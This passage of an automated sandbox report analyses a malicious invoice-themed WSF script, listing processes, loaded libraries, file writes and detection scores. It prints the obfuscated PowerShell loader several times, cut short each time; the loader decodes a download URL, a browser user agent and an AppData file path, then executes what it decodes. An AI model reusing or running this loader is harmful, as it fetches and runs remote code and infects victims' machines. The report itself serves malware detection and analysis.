Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD346F4C285_2_00007FFD346F4C28
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347C5DFE5_2_00007FFD347C5DFE
      Source: Wniosek o numer faktury.wsfInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9147
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9147Jump to behavior
      Source: classification engineClassification label: mal96.troj.expl.evad.winWSF@9/3@2/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kassestrimmelens.AftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_did32yk0.pdw.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Wniosek o numer faktury.wsfReversingLabs: Detection: 23%
      Source: Wniosek o numer faktury.wsfVirustotal: Detection: 19%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb95f source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.4646772637.0000015DEFAAB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb!1 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspira", "0")
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34961CE4 push esp; retf 5_2_00007FFD34961D09
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD349636A5 push ebx; ret 5_2_00007FFD349636A6
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
